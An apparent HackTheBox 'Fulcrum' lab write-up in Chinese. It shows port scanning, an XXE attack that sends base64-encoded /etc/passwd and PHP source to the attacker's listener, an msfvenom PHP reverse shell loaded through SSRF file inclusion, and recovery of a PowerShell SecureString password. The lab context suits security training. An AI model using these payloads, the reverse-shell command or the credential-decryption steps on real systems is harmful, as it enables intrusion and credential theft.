title: HackTheBox-Fulcrum author: CrazyInSide layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Fulcrum (1).png tags:

•Linux

Recon：

CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.62 [sudo] crazyinside 的密码：Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-09-03 00:25:25 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 9999/tcp on 10.10.10.62                                   Discovered open port 4/tcp on 10.10.10.62                                      Discovered open port 56423/tcp on 10.10.10.62                                  Discovered open port 80/tcp on 10.10.10.62                                     Discovered open port 22/tcp on 10.10.10.62                                     Discovered open port 88/tcp on 10.10.10.62

CrazyInSide:~/HackTheBox$ sudo nmap -sC -sV 10.10.10.62 -p4,22,80,88,9999,54623[sudo] crazyinside 的密码：Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-09-03 08:28 CSTNmap scan report for 10.10.10.62Host is up (0.30s latency).
PORT      STATE  SERVICE VERSION4/tcp     open   http    nginx 1.18.0 (Ubuntu)|_http-server-header: nginx/1.18.0 (Ubuntu)|_http-title: Site doesn't have a title (text/html; charset=UTF-8).22/tcp    open   ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)80/tcp    open   http    nginx 1.18.0 (Ubuntu)|_http-server-header: nginx/1.18.0 (Ubuntu)|_http-title: 502 Bad Gateway88/tcp    open   http    nginx 1.18.0 (Ubuntu)|_http-server-header: nginx/1.18.0 (Ubuntu)|_http-title: phpMyAdmin| http-robots.txt: 1 disallowed entry |_/9999/tcp  open   http    nginx 1.18.0 (Ubuntu)|_http-title: 502 Bad Gateway|_http-server-header: nginx/1.18.0 (Ubuntu)56423/tcp open  http    nginx 1.18.0 (Ubuntu)|_http-title: Site doesn't have a title (application/json;charset=utf-8).|_http-server-header: Fulcrum-API BetaService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 52.37 secondszsh: segmentation fault  sudo nmap -sC -sV 10.10.10.62 -p4,22,80,88,9999,54623

端口4：

点击之后会出现一个链接，看起来像文件包含：

CrazyInSide:~/HackTheBox$ dirsearch -u http://10.10.10.62:4/         
  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.62-4/-_22-09-03_08-32-57.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-03_08-32-57.log
Target: http://10.10.10.62:4/
[08:32:58] Starting: [08:34:21] 200 -  312B  - /home.php[08:34:24] 200 -  110B  - /index.php[08:35:08] 200 -   54B  - /upload.php
Task Completed                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$

不管上传什么都会失败。又枚举了半天疑似文件包含的参数，没什么收获：

CrazyInSide:~/HackTheBox$ wfuzz -w /usr/share/wordlists/dirb/big.txt -u 'http://10.10.10.62:4/index.php?page=FUZZ' --hh 110 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 3.1.0 - The Web Fuzzer                         *********************************************************
Target: http://10.10.10.62:4/index.php?page=FUZZTotal requests: 20469
=====================================================================ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                                                         =====================================================================
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 0Processed Requests: 12902Filtered Requests: 12902Requests/sec.: 0
                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$

端口80，目标是台linux，报的确实windows .net错，可能是nginx在代理内网服务：

但是没东西：

CrazyInSide:~/HackTheBox$ dirsearch -u http://10.10.10.62 -e asp,aspx
  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: asp, aspx | HTTP method: GET | Threads: 30 | Wordlist size: 9511
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.62/_22-09-03_08-39-56.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-03_08-39-56.log
Target: http://10.10.10.62/
[08:39:57] Starting: [08:40:38] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd[08:41:37] 200 -    5KB - /index.htm
Task Completed                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$

端口88是一个PHPMYadmin：

尝试输入了root:root没进去。先放着，后边再说。9999端口与80是一样的：

CrazyInSide:~/HackTheBox$ dirsearch -u http://10.10.10.62:9999/      
  _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.62-9999/-_22-09-03_08-48-51.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-03_08-48-51.log
Target: http://10.10.10.62:9999/
[08:48:51] Starting: [08:49:31] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd[08:50:46] 200 -    5KB - /index.htm
Task Completed

端口56423打开是一个json格式的数据：

CrazyInSide:~/HackTheBox$ curl -I http://10.10.10.62:56423/HTTP/1.1 200 OKDate: Sat, 03 Sep 2022 00:54:17 GMTContent-Type: application/json;charset=utf-8Connection: keep-aliveServer: Fulcrum-API Beta

CrazyInSide:~/HackTheBox$ curl http://10.10.10.62:56423/  {"Heartbeat":{"Ping":"Pong"}}                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423/{"Heartbeat":{"Ping":"Pong"}}
                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d {"Heartbeat":{"Ping":"ping"}}{"Heartbeat":{"Ping":"Pong"}}
                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d '{"Heartbeat":{"Ping":"ping"}}' {"Heartbeat":{"Ping":"Pong"}}

CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d '{"Heartbeat":{"Ping":"ping"}}' -H 'Content-Type: application/json'{"Heartbeat":{"Ping":"Pong"}}

好像都没什么反应，搜索相关资料，提示说这种API可以尝试提交json数据，HTTP参数，甚至XML都可以。

CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d 'Heartbeat[Ping]=Pong'                                             {"Heartbeat":{"Ping":"Pong"}}
                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$ curl http://10.10.10.62:56423 -d 'Heartbeat[Ping]=Pong' {"Heartbeat":{"Ping":"Pong"}}

参数也不行。我尝试xml时候：

CrazyInSide:~/HackTheBox$ curl -X POST http://10.10.10.62:56423 -d 'Ping'{"Heartbeat":{"Ping":"Ping"}}

它变了。

尝试读取文件，目标只显示ping pong，无法正常读取文件。

CrazyInSide:~/HackTheBox$ cat payload.dtd ">%all;                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$

再构造数据包：

POST / HTTP/1.1Host: 10.10.10.62:56423Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 115
xml version="1.0" encoding="utf-8"?>&send;

10.10.10.62 - - [03/Sep/2022 09:32:22] "GET /?cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMDoxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMToxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC10aW1lc3luYzp4OjEwMjoxMDQ6c3lzdGVtZCBUaW1lIFN5bmNocm9uaXphdGlvbiwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDY6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXNsb2c6eDoxMDQ6MTEwOjovaG9tZS9zeXNsb2c6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnRzczp4OjEwNjoxMTE6VFBNIHNvZnR3YXJlIHN0YWNrLCwsOi92YXIvbGliL3RwbTovYmluL2ZhbHNlCnV1aWRkOng6MTA3OjExMjo6L3J1bi91dWlkZDovdXNyL3NiaW4vbm9sb2dpbgp0Y3BkdW1wOng6MTA4OjExMzo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCmxhbmRzY2FwZTp4OjEwOToxMTU6Oi92YXIvbGliL2xhbmRzY2FwZTovdXNyL3NiaW4vbm9sb2dpbgpwb2xsaW5hdGU6eDoxMTA6MTo6L3Zhci9jYWNoZS9wb2xsaW5hdGU6L2Jpbi9mYWxzZQpzc2hkOng6MTExOjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC1jb3JlZHVtcDp4Ojk5OTo5OTk6c3lzdGVtZCBDb3JlIER1bXBlcjovOi91c3Ivc2Jpbi9ub2xvZ2luCmx4ZDp4Ojk5ODoxMDA6Oi92YXIvc25hcC9seGQvY29tbW9uL2x4ZDovYmluL2ZhbHNlCnVzYm11eDp4OjExMjo0Njp1c2JtdXggZGFlbW9uLCwsOi92YXIvbGliL3VzYm11eDovdXNyL3NiaW4vbm9sb2dpbgpkbnNtYXNxOng6MTEzOjY1NTM0OmRuc21hc3EsLCw6L3Zhci9saWIvbWlzYzovdXNyL3NiaW4vbm9sb2dpbgpsaWJ2aXJ0LXFlbXU6eDo2NDA1NToxMDg6TGlidmlydCBRZW11LCwsOi92YXIvbGliL2xpYnZpcnQ6L3Vzci9zYmluL25vbG9naW4KbGlidmlydC1kbnNtYXNxOng6MTE0OjEyMDpMaWJ2aXJ0IERuc21hc3EsLCw6L3Zhci9saWIvbGlidmlydC9kbnNtYXNxOi91c3Ivc2Jpbi9ub2xvZ2luCg==

CrazyInSide:~/HackTheBox$ echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMDoxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMToxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC10aW1lc3luYzp4OjEwMjoxMDQ6c3lzdGVtZCBUaW1lIFN5bmNocm9uaXphdGlvbiwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDY6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzeXNsb2c6eDoxMDQ6MTEwOjovaG9tZS9zeXNsb2c6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnRzczp4OjEwNjoxMTE6VFBNIHNvZnR3YXJlIHN0YWNrLCwsOi92YXIvbGliL3RwbTovYmluL2ZhbHNlCnV1aWRkOng6MTA3OjExMjo6L3J1bi91dWlkZDovdXNyL3NiaW4vbm9sb2dpbgp0Y3BkdW1wOng6MTA4OjExMzo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCmxhbmRzY2FwZTp4OjEwOToxMTU6Oi92YXIvbGliL2xhbmRzY2FwZTovdXNyL3NiaW4vbm9sb2dpbgpwb2xsaW5hdGU6eDoxMTA6MTo6L3Zhci9jYWNoZS9wb2xsaW5hdGU6L2Jpbi9mYWxzZQpzc2hkOng6MTExOjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kc3lzdGVtZC1jb3JlZHVtcDp4Ojk5OTo5OTk6c3lzdGVtZCBDb3JlIER1bXBlcjovOi91c3Ivc2Jpbi9ub2xvZ2luCmx4ZDp4Ojk5ODoxMDA6Oi92YXIvc25hcC9seGQvY29tbW9uL2x4ZDovYmluL2ZhbHNlCnVzYm11eDp4OjExMjo0Njp1c2JtdXggZGFlbW9uLCwsOi92YXIvbGliL3VzYm11eDovdXNyL3NiaW4vbm9sb2dpbgpkbnNtYXNxOng6MTEzOjY1NTM0OmRuc21hc3EsLCw6L3Zhci9saWIvbWlzYzovdXNyL3NiaW4vbm9sb2dpbgpsaWJ2aXJ0LXFlbXU6eDo2NDA1NToxMDg6TGlidmlydCBRZW11LCwsOi92YXIvbGliL2xpYnZpcnQ6L3Vzci9zYmluL25vbG9naW4KbGlidmlydC1kbnNtYXNxOng6MTE0OjEyMDpMaWJ2aXJ0IERuc21hc3EsLCw6L3Zhci9saWIvbGlidmlydC9kbnNtYXNxOi91c3Ivc2Jpbi9ub2xvZ2luCg=="|base64 -droot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologinsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinsystemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:103:106::/nonexistent:/usr/sbin/nologinsyslog:x:104:110::/home/syslog:/usr/sbin/nologin_apt:x:105:65534::/nonexistent:/usr/sbin/nologintss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/falseuuidd:x:107:112::/run/uuidd:/usr/sbin/nologintcpdump:x:108:113::/nonexistent:/usr/sbin/nologinlandscape:x:109:115::/var/lib/landscape:/usr/sbin/nologinpollinate:x:110:1::/var/cache/pollinate:/bin/falsesshd:x:111:65534::/run/sshd:/usr/sbin/nologinsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinlxd:x:998:100::/var/snap/lxd/common/lxd:/bin/falseusbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologindnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologinlibvirt-qemu:x:64055:108:Libvirt Qemu,,,:/var/lib/libvirt:/usr/sbin/nologinlibvirt-dnsmasq:x:114:120:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/usr/sbin/nologin

这似乎没有一个标准的用户是能够用来正常登录的，猜路径吧，猜了半天，4端口是叫uploads：

CrazyInSide:~/HackTheBox$ cat payload.dtd ">%all;                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$

0.10.10.62 - - [03/Sep/2022 09:49:07] "GET /payload.dtd HTTP/1.0" 200 -10.10.10.62 - - [03/Sep/2022 09:49:07] "GET /?PD9waHAKaWYoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gIT0gIjEyNy4wLjAuMSIpCnsKCWVjaG8gIjxoMT5VbmRlciBNYWludGFuY2U8L2gxPjxwPlBsZWFzZSA8YSBocmVmPVwiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSAuICI6NC9pbmRleC5waHA/cGFnZT1ob21lXCI+dHJ5IGFnYWluPC9hPiBsYXRlci48L3A+IjsKfWVsc2V7CgkkaW5jID0gJF9SRVFVRVNUWyJwYWdlIl07CglpbmNsdWRlKCRpbmMuIi5waHAiKTsKfQo/PgoK HTTP/1.0" 200 -

CrazyInSide:~/HackTheBox$ echo "PD9waHAKaWYoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gIT0gIjEyNy4wLjAuMSIpCnsKCWVjaG8gIjxoMT5VbmRlciBNYWludGFuY2U8L2gxPjxwPlBsZWFzZSA8YSBocmVmPVwiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX0FERFInXSAuICI6NC9pbmRleC5waHA/cGFnZT1ob21lXCI+dHJ5IGFnYWluPC9hPiBsYXRlci48L3A+IjsKfWVsc2V7CgkkaW5jID0gJF9SRVFVRVNUWyJwYWdlIl07CglpbmNsdWRlKCRpbmMuIi5waHAiKTsKfQo/PgoK"|base64 -dphpif($_SERVER['REMOTE_ADDR'] != "127.0.0.1"){        echo "Under Maintance
Please  . $_SERVER['SERVER_ADDR'] . ":4/index.php?page=home\">try again later.
";}else{        $inc = $_REQUEST["page"];        include($inc.".php");}?>
                                                                                                                                                                                                                                                                                 CrazyInSide:~/HackTheBox$

只有远程地址等于127.0.0.1才能包含：

CrazyInSide:~/HackTheBox$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f raw > shell.php[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload[-] No arch selected, selecting arch: php from the payloadNo encoder specified, outputting raw payloadPayload size: 1111 bytes

POST / HTTP/1.1Host: 10.10.10.62:56423Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 143
xml version="1.0" encoding="utf-8"?>&send;

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.3:4444 [*] Sending stage (39927 bytes) to 10.10.10.62[*] Meterpreter session 1 opened (10.10.16.3:4444 -> 10.10.10.62:60246) at 2022-09-03 09:51:52 +0800
meterpreter >

初始访问：

作为一个linux，居然有一个powershell脚本：

meterpreter > lsListing: /var/www/uploads=========================
Mode              Size  Type  Last modified              Name----              ----  ----  -------------              ----100644/rw-r--r--  714   fil   2017-10-05 06:01:00 +0800  Fulcrum_Upload_to_Corp.ps1100644/rw-r--r--  321   fil   2017-10-05 03:57:06 +0800  home.php100644/rw-r--r--  255   fil   2017-10-06 03:08:22 +0800  index.php100644/rw-r--r--  113   fil   2017-10-05 03:54:48 +0800  upload.php
meterpreter > download Fulcrum_Upload_to_Corp.ps1[*] Downloading: Fulcrum_Upload_to_Corp.ps1 -> /home/crazyinside/HackTheBox/Fulcrum_Upload_to_Corp.ps1[*] Downloaded 714.00 B of 714.00 B (100.0%): Fulcrum_Upload_to_Corp.ps1 -> /home/crazyinside/HackTheBox/Fulcrum_Upload_to_Corp.ps1[*] download   : Fulcrum_Upload_to_Corp.ps1 -> /home/crazyinside/HackTheBox/Fulcrum_Upload_to_Corp.ps1meterpreter >

# TODO: Forward the PowerShell remoting port to the external interface# Password is now encrypted \o/
$1 = 'WebUser'$2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ','$3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA=' $4 = $3 | ConvertTo-SecureString -key $2$5 = New-Object System.Management.Automation.PSCredential ($1, $4)
Invoke-Command -Computer upload.fulcrum.local -Credential $5 -File Data.ps1

┌──(crazyinside㉿ParrotOS)-[/home/crazyinside]└─PS> $1 = 'WebUser'    
┌──(crazyinside㉿ParrotOS)-[/home/crazyinside]└─PS> $2 = '77,52,110,103,63,109,63,110,116,80,97,53,53,77,52,110,103,63,109,63,110,116,80,97,53,53,48,48,48,48,48,48' -split ','
┌──(crazyinside㉿ParrotOS)-[/home/crazyinside]└─PS> $3 = '76492d1116743f0423413b16050a5345MgB8AEQAVABpAHoAWgBvAFUALwBXAHEAcABKAFoAQQBNAGEARgArAGYAVgBGAGcAPQA9AHwAOQAwADgANwAxADIAZgA1ADgANwBiADIAYQBjADgAZQAzAGYAOQBkADgANQAzADcAMQA3AGYAOQBhADMAZQAxAGQAYwA2AGIANQA3ADUAYQA1ADUAMwA2ADgAMgBmADUAZgA3AGQAMwA4AGQAOAA2ADIAMgAzAGIAYgAxADMANAA=' 
┌──(crazyinside㉿ParrotOS)-[/home/crazyinside]└─PS> $4 = $3 | ConvertTo-SecureString -key $2
┌──(crazyinside㉿ParrotOS)-[/home/crazyinside]└─PS> $5 = New-Object System.Management.Automation.PSCredential ($1, $4)
┌──(crazyinside㉿ParrotOS)-[/home/crazyinside]└─PS> $5
UserName                     Password--------                     --------WebUser  System.Security.SecureString
┌──(crazyinside㉿ParrotOS)-[/home/crazyinside]└─PS> $5.GetNetworkCredential() | Format-List *
UserName       : WebUserPassword       : M4ng£m£ntPa55SecurePassword : System.Security.SecureStringDomain         :

powershell中PSCredential对象可以恢复密码。我觉得是内网某台windows主机上的，而我当前环境是一个linux，所以我开始枚举网络信息：

meterpreter > shellProcess 5035 created.Channel 1 created.ifconfigens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 10.10.10.62  netmask 255.255.255.0  broadcast 10.10.10.255        inet6 fe80::250:56ff:feb9:21a8  prefixlen 64  scopeid 0x20        inet6 dead:beef::250:56ff:feb9:21a8  prefixlen 64  scopeid 0x0        ether 00:50:56:b9:21:a8  txqueuelen 1000  (Ethernet)        RX packets 319079  bytes 31518824 (31.5 MB)        RX errors 0  dropped 71  overruns 0  frame 0        TX packets 158545  bytes 50733938 (50.7 MB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536        inet 127.0.0.1  netmask 255.0.0.0        inet6 ::1  prefixlen 128  scopeid 0x10        loop  txqueuelen 1000  (Local Loopback)        RX packets 119145  bytes 24175896 (24.1 MB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 119145  bytes 24175896 (24.1 MB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
virbr0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 192.168.122.1  netmask 255.255.255.0  broadcast 192.168.122.255        ether 52:54:00:97:17:b7  txqueuelen 1000  (Ethernet)        RX packets 64680  bytes 29586894 (29.5 MB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 95842  bytes 10911830 (10.9 MB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
vnet0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet6 fe80::fc54:ff:fe9e:52f2  prefixlen 64  scopeid 0x20        ether fe:54:00:9e:52:f2  txqueuelen 1000  (Ethernet)        RX packets 1330  bytes 166128 (166.1 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 5135  bytes 382282 (382.2 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
